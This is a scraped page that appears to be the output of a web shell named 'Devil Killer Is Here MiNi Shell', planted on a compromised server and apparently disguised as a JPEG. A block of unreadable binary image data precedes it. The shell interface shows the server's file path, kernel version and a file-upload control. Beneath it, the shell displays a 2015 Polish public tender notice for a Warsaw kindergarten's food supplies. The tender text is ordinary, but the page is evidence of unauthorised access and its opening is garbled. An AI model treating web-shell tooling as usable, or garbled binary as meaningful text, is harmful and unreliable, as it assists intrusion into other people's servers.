JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151120/170695-N-2015.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na pakiety</b><br>
<b>Numer ogłoszenia: 170695 - 2015; data zamieszczenia: 20.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 31 im. Zdzisława Witwickiego , ul. Krucza 19, 00-525 Warszawa, woj. mazowieckie, tel. 22 621 99 40, faks 22 621 99 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole31.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na pakiety.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na pakiety.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających nie przekraczających łącznie 20% wartości udzielonego zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postepowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postepowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postepowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postepowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postepowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole31.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 31 im. Zdzisława Witwickiego, ul. Krucza 19, 00-525 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2015 godzina 10:00, miejsce: Przedszkole Nr 31 im. Zdzisława Witwickiego, ul. Krucza 19, 00-525 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	BAGIETKA DŁUGA KROJONA, 300-350g, nie odświeżana, bez cukru i substancji słodzących i z obniżoną zawartością soli	szt.	100
2	BUŁKA grahamka, bez konserwantów i polepszaczy, 50-60g, z obniżoną zawartością soli i bez cukru i substancji słodzących.	szt.	1200
3	BUŁKA typu kajzerka z mąki pełnoziarnistej z ziarnami, bez konserwantów i polepszaczy, 50-60g, z obniżoną zawartością soli i bez cukru i substancji słodzących.	szt.	1200
4	BUŁKA TARTA, 500g	szt.	100
5	CHAŁKA  PSZENNA TRADYCYJNA, bez konserwantów i polepszaczy, z obniżoną zawartością soli i cukru, bez substancji słodzących, 300g	szt.	25
6	CHLEB BALTONOWSKI, krojony lub nie, 600-650g, bez konserwantów, nie odgrzewany, z obniżoną zawartością soli, bez cukru i substancji słodzących	szt.	100
7	CHLEB PYTLOWY, bez konserwantów i polepszaczy, na zakwasie, 600g, nie odświeżany, z obniżoną zawartością soli, bez cukru i substancji słodzących	szt.	800
8	CHLEB NA MIODZIE, krojony, 450-500g, nie odświeżany, bez zawartości cukru i substancji słodzących, bez barwników i o niskiej zawartości soli	szt.	250
9	CHLEB PEŁNOZIARNISTY, z mąki pszenno-żytniej z ziarnami, bez konserwantów i polepszaczy, krojony lub nie, na zakwasie, 600g, bez substancji słodzących, barwników i z obniżoną zawartością soli	szt.	600
10	CHLEB ORKISZOWY  Z ZIARNAMI, posypany makiem lub nie, krojony, 600g, nie odświeżany, BEZ CUKRU I SUBSTANCJI SLODZĄCYCH I O OBNIŻONEJ ZAWARTOŚCI SOLI	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	FILET Z ŁOSOSIA, mrożony, ze skórą, nie więcej niż 3% glazury technologicznej, opakowanie 2500g	 kg	60
2	FILET Z MINTAJA, mrożony, płaty, nie więcej niż 3% glazury technologicznej, opakowanie 2500g 	 kg	100
3	FILET Z MIRUNY, mrożony, płaty shp/bs, opakowanie (szaterpack) 6,8-7,0kg	kg	100
4	FILET Z SOLI, mrożony, filet bez skóry i ości, max. 3% glazury technologicznej, opakowanie folia lub karton 2500-5000g	kg	100
5	ŁOSOŚ WĘDZONY NA ZIMNO, plastrowany, zapakowany próżniowo na tacce, niemrożony, minimalny termin przydatności do spożycia - 10 dni od daty dostawy	 kg	15
6	MAKRELA WĘDZONA (świeża, zapakowana hermetycznie, duże tusze)	kg	25
7	ŚLEDŹ SOLONY typu matjas, opakowanie plastikowe	kg	5
8	FILET Z TILAPII, mrożony, filet bez skóry i ości, max. 3% glazury technologicznej, opakowanie folia lub karton 2500-5000g	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa, owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	ANANAS świeży, dojrzały, 	szt.	100
2	ARBUZ klasa I wg Rozporządzenia Komisji WE nr 1093/97 (dostawa w sezonie)	kg	200
3	AVOCADO, owoc świeży, dojrzały	szt.	60
4	BAKŁAŻAN świeży	kg	20
5	BANANY klasa I wg Rozporządzenia Komisji WE nr 2257/94 odmiana CONSUL, TURBAN, MONITA, CHIQUITTA (listopad-marzec)	kg	300
6	BANANY klasa I wg Rozporządzenia Komisji WE nr 2257/94,  odmiana CONSUL, TURBAN, MONITA, CHIQUITTA (kwiecień-październik)	kg	300
7	BORÓWKA AMERYKAŃSKA, opakowanie 500g	szt.	50
8	BOTWINA, pęczek 400-500g, wielkość sezonowa	pęczek	35
9	BRZOSKWINIE	kg	30
10	BURAKI CZERWONE, konsumpcyjne, bez liści, wielkość średnia	kg	250
11	CEBULA BIAŁA (bez szczypioru), wielkość średnia	kg	350
12	CEBULA CZERWONA (wielkośc średnia)	kg	20
13	CUKINIA, sezonowo	kg	50
14	CYKORIA	kg	100
15	CYTRYNA (średnia wielkość)	kg	65
16	CZOSNEK ŚWIEŻY (min. 80g), krajowy	szt.	200
17	DYMKA ZE SZCZYPIOREM, pęczki, wielkość sezonowa	szt.	50
18	DYNIA, dojrzała, słodka (wrzesień-grudzień), min. 800g	kg	150
19	FASOLA BIAŁA SUCHA, drobna, opakowanie 1000g 	kg	50
20	FASOLKA SZPARAGOWA ZIELONA, bez łyka	kg	10
21	FASOLKA SZPARAGOWA ŻÓŁTA, bez łyka	kg	10
22	OWOC GRANATU	szt.	60
23	GREJFRUT CZERWONY 	kg	50
24	GROCH ŁUSKANY, POŁÓWKI, opakowanie 1000g	kg	50
25	GRUSZKI (krajowe)	kg	250
26	JABŁKA KOMPOTOWE (np. Reneta, Antonówka, krajowe)	kg	50
27	JABŁKA, typu cortland, ligol champion, delikates, rubin, jonagored, średnia wielkość, bez korka	kg	2000
28	JAJA KONSUMPCYJNE KURZE, świeże (z chowu klatkowego, klasa L duże - 63-73g), zdezynfekowane za pomocą promienia ultrafioletowego	szt.	5000
29	KALAFIOR (min. 800g)	szt.	25
30	KALAREPA	szt.	250
31	KAPUSTA BIAŁA (główka 2000-3000g)	kg	250
32	KAPUSTA CZERWONA, główka 2000-2500g	kg	100
33	KAPUSTA KISZONA BIAŁA, nie przekwaszona, opakowanie wiaderko plastikowe 5000g	kg	250
34	KAPUSTA KISZONA CZERWONA, nie przekwaszona, opakowanie wiaderko plastikowe 5000g	kg	20
35	KAPUSTA MŁODA, główka min. 800g (maj-czerwiec)	szt.	100
36	KAPUSTA PEKIŃSKA (foliowana)	kg	25
37	KAPUSTA WŁOSKA, główka 1800-2200g	kg	150
38	KIEŁKI ŚWIEŻE, opakowanie 250-300g	szt.	100
39	KIWI (sztuka 15-20g, dostawa na palecie)	szt.	1500
40	KOPEREK (natka), pęczek, wielkość sezonowa	szt.	450
41	MANDARYNKA, bezpestkowa	kg	150
42	MANGO, świeże, dojrzałe	szt.	100
43	MARCHEW KAROTKA MŁODA Z NACIĄ, pęczki, wielkość sezonowa	szt.	50
44	MARCHEW KAROTKA, wielkość średnia, bez naci	kg	750
45	MELON DOJRZAŁY ŚWIEZY	kg	50
46	NATKA PIETRUSZKI, pęczki, waga sezonowa	szt.	300
47	NEKTARYNKA	kg	60
48	OGÓREK GRUNTOWY ŚWIEŻY (krajowy)	kg	25
49	OGÓREK KISZONY w naturalnym kwasie z koprem i solą (wiaderko, pojemność 3000-6000g)	kg	150
50	OGÓREK MAŁOSOLNY, w naturalnym kwasie z koprem i solą (wiaderko, pojemność 3000-6000g)	kg	30
51	OGÓREK ZIELONY SZKLARNIOWY ŚWIEŻY (kwiecień-październik)	kg	200
52	OGÓREK ZIELONY SZKLARNIOWY ŚWIEŻY (listopad-marzec)	kg	250
53	PAPRYKA CZERWONA (kwiecień-październik)	kg	100
54	PAPRYKA CZERWONA (listopad-marzec)	kg	150
55	PIECZARKI	kg	100
56	PIETRUSZKA	kg	200
57	POMARAŃCZE TYPU NOWELINA, cienka skórka	kg	100
58	POMIDORY CZERWONE (kwiecień-październik)	kg	200
59	POMIDORY CZERWONE (listopad-marzec)	kg	250
60	POR	szt.	200
61	RZODKIEW BIAŁA, wielkość sezonowa	kg	50
62	RZODKIEWKA, okrągła, pęczki 180-250g	szt.	400
63	SAŁATA LODOWA (pakowana każda główka osobno), waga jednej sztuki min. 350g	szt.	80
64	SAŁATA ZIELONA (kwiecień-październik), wielkość sezonowa	szt.	100
65	SAŁATA ZIELONA (listopad-marzec), wielkość sezonowa	szt.	200
66	SELER KORZENIOWY	kg	200
67	SELER NACIOWY (min. 300g)	szt.	50
68	SZCZYPIOREK ŚWIEŻY, pęczek, wielkość sezonowa	szt.	200
69	ŚLIWKI DESEROWE TYPU WĘGIERKA/PREZYDENT,dojrzałość konsumpcyjna, odchodzące od pestek (wrzesień-grudzień, krajowa)	kg	100
70	TRUSKAWKA, krajowa, odmiana konsumpcyjna, w całości wybarwiona, dostawa w łubiankach, ( maj-czerwiec )	kg	50
71	WINOGRONA JASNE/CIEMNE, kiście zagraniczne	kg	250
72	ZIEMNIAKI MŁODE, średniej wielkości, (maj-czerwiec)	kg	200
73	ZIEMNIAKI, typu Irga, konsumpcyjne, umyte, skórka bez zielonych zabarwień, bez kiełkujących oczek, wielkość średnia (produkty dostarczane w okresie od stycznia do czerwca z produkcji 2015 r., a produkty dostarczane od września do grudnia tylko z produkcji 2016 roku)	kg	4000
74	KABACZEK, luz	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	CIELĘCINA - UDZIEC (sznycel tandryzowany), świeża, nie rozmrażana	kg	30
2	CIELĘCINA ZADNIA, bez kości, kawałki min. 500g, świeża, nie rozmrażana	kg	15
3	INDYK FILET Z PIERSI, przedział wagowy 1000-1500g, świeży, bez skóry, bez kości, nie rozmrażany	kg	50
4	INDYK UDZIEC, bez skóry i kości, nie rozmrażany	kg	300
5	INDYK UDZIEC, ze skórą i kością, nie rozmrażany	kg	50
7	KIEŁBASA CIENKA TYPU PODWAWELSKA/TORUŃSKA, mięso wieprzowe min. 90%	kg	25
8	KIEŁBASA KRAKOWSKA SUCHA o zawartości minimum 90% mięsa	kg	40
9	KIEŁBASA ŚLĄSKA, mięso wieprzowe min. 90%	kg	15
10	KURA ROSOŁOWA (wypatroszona, w całości, 1800-2500g)	kg	100
11	KURCZAK FILET Z PIERSI, świeże, nie rozmrażane, bez skóry, bez chrząstki, pojedyncze w przedziale wagowym 300-400g	kg	50
12	KURCZAK PODUDZIE (pałka 10-15g), surowy, nie rozmrażany	kg	20
13	KURCZAK ĆWIARTKI z kością (udka), surowe, nie rozmrażane	kg	300
14	KURCZAK UDZIEC KULINARNY(bioderko) bez kości grzbietowych kupra i tłuszczu, 15-20g	kg	20
17	WĄTRÓBKA Z INDYKA, ŚWIEŻA, NIE ROZMRAŻANA	kg	100
18	WĘDLINA - FILET Z INDYKA WĘDZONY o niskiej zawartości soli/sodu, opakowanie 500-800g, zamknięte próźniowo	kg	30
19	WĘDLINA - SZYNKA KONSERWOWA, mięso wieprzowe min. 90% o niskiej zawartośco soli/sodu	kg	30
20	WĘDLINA - POLĘDWICA DROBIOWA, wędzonka drobiowa wysoko wydajna, o zawartości mięsa z indyka min. 90% i niskiej (obniżonej) zawartośco soli/sodu	kg	30
21	WĘDLINA - POLĘDWICA SOPOCKA, z mięsa wieprzowego o niskiej zawartości soli/sodu	kg	30
22	WĘDLINA - POLĘDWICA WOŁOWA, o niskiej zawartości  soli/sodu	kg	15
23	WĘDLINA - SZYNKA GOTOWANA WIEPRZOWA, mięso wieprzowe min. 67%	kg	30
24	WIEPRZOWINA - ŁOPATKA, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeża, nie rozmrażana, kawałki 1000-1500g	kg	100
25	WIEPRZOWINA - MIĘSO Z SZYNKI, bez kości, bez tłuszczu, kawałki 1000-1500g oraz kulki, świeże, nie rozmrażane	kg	200
26	WIEPRZOWINA - SCHAB karkowy BEZ KOŚCI, o średnicy nie większej niż 15cm, świeży, słonina zdjęta, o niskiej zawartości tłuszczu, nie rozmrażany, kawałek 1500-2000g	kg	20
27	WIEPRZOWINA - SCHAB ŚRODKOWY BEZ KOŚCI, o średnicy nie większej niż 10cm, świeży, słonina zdjęta, nie rozmrażany, kawałek 1500-2000g	kg	100
28	WIEPRZOWINA - POLĘDWICZKI SUROWE, całe, nie rozmrażane	kg	50
29	WOŁOWINA - ŁATA (z młodej wołowiny Bukat do 1 roku)	kg	20
30	WOŁOWINA - SZPONDER, chudy, surowy, barwa tłuszczu - biała, paski długości do 40cm, szerokość do 12cm, świeży, nie rozmrażany	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	ANANAS KONSERWOWY, opakowanie puszka 550-650g	szt.	5
2	BARSZCZ BIAŁY TYPU KNORR/WINIARY, opakowanie 1000g, wydajność min. 1000ml ze 100g produktu, 	szt.	1
3	BATON MUSLI owocowy  35-50g, 15% płatków owsianych i pszennych, 8% rodzynek, 8% jabłek.	szt.	300
4	BAZYLIA SUSZONA, opakowanie 10-15g	szt.	100
5	BISZKOPTY, opakowanie 120-150g	szt.	100
6	BRZOSKWINIE POŁÓWKI  800-850g puszka, lekko słodzone	szt.	5
7	BUDYŃ, różne smaki, opakowanie 1 - 1,3 kg typu WINIARY, bez sztucznych barwników o wydajności 11 litrów	szt.	2
8	CHRZAN TARTY, opakowanie słoik 260-300g, bez dodatku octu	szt.	15
9	CIASTECZKA OWSIANE 64,3 % z pełnego ziarna owsa, bez dodatku pszenicy,138g	szt	300
10	CIECIERZYCA TYPU SANTE ,op. 350g	szt.	100
11	CUKIER BIAŁY, drobny kryształ, opakowanie 1000g	kg	50
12	CUKIER TRZCINOWY brązowy, opakowanie 500g	szt.	30
13	CUKIER PUDER opakowanie 400-500g	szt.	5
14	CURRY opakowanie 15-20g	szt.	30
15	CYNAMON, opakowanie 10-15g	szt.	50
16	CZEKOLADOWE JAJA Z NIESPODZIANKĄ, 60-100g	szt.	150
17	CZEKOLADOWE MIKOŁAJE, 60-100g	szt.	150
18	DROŻDŻE ŚWIEŻE opakowanie 100-120g	szt.	50
